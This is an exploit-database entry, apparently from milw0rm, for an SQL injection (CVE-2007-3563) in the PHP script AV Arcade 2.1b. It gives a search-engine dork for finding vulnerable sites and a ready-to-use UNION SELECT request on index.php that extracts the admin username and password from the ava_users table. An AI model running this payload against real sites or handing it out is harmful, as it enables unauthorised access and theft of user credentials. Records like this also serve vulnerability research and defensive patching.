EXPLOITS

AV Arcade 2.1b - 'index.php?id' SQL Injection

Author: Kw3[R]Ln
type: webapps
platform: php
port: 
date_added: 2007-07-01  
date_updated:   
verified: 1  
codes: OSVDB-36354;CVE-2007-3563  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4138.txt  

Web: AV Arcade 2.1b
Site : www.avscripts.net
Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET


Description: SQL injection in $id of includes/view_page.php

Exploit:
/index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ]

# milw0rm.com [2007-07-02]